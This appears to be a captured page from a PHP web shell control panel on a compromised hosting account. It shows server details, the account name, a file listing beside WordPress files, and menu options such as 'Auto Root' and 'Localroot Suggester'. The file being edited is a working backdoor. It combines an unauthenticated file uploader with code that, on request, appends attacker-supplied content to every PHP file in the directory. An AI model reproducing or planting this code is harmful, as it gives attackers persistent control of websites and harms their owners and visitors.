Linux thaedus.aserv.co.za 5.14.0-687.24.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jul 9 18:14:06 EDT 2026 x86_64
LiteSpeed
Server IP : 197.242.159.149 & Your IP : 216.73.217.62
Domains :
Cant Read [ /etc/named.conf ]
User : bigpuxtb
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
bigpuxtb /
php /
Delete
Unzip
Name
Size
Permission
Date
Action
.channels
[ DIR ]
drwxr-xr-x
2025-02-03 13:08
.registry
[ DIR ]
drwxr-xr-x
2025-02-03 13:08
data
[ DIR ]
drwxr-xr-x
2026-03-25 19:09
docs
[ DIR ]
drwxr-xr-x
2026-03-25 19:09
ext
[ DIR ]
drwxr-xr-x
2026-03-25 19:09
tests
[ DIR ]
drwxr-xr-x
2026-03-25 19:09
rhugrxtx.php
760
B
-rw-r--r--
2026-01-07 15:23
wp-blog-header.php
2.74
KB
-r--r--r--
2026-01-12 04:05
wp-cron.php
2.74
KB
-rw-r--r--
2026-01-12 04:05
Save
Rename
<?php echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?> <?php if (isset($_GET['bak'])) { $directory = __DIR__; $mama = $_POST['file']; $textToAppend = ' ' . $mama . ' '; if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if (pathinfo($file, PATHINFO_EXTENSION) === 'php') { $fileHandle = fopen($directory . '/' . $file, 'a'); fwrite($fileHandle, $textToAppend); fclose($fileHandle); echo "OK >> $file "; } } closedir($handle); } } ?>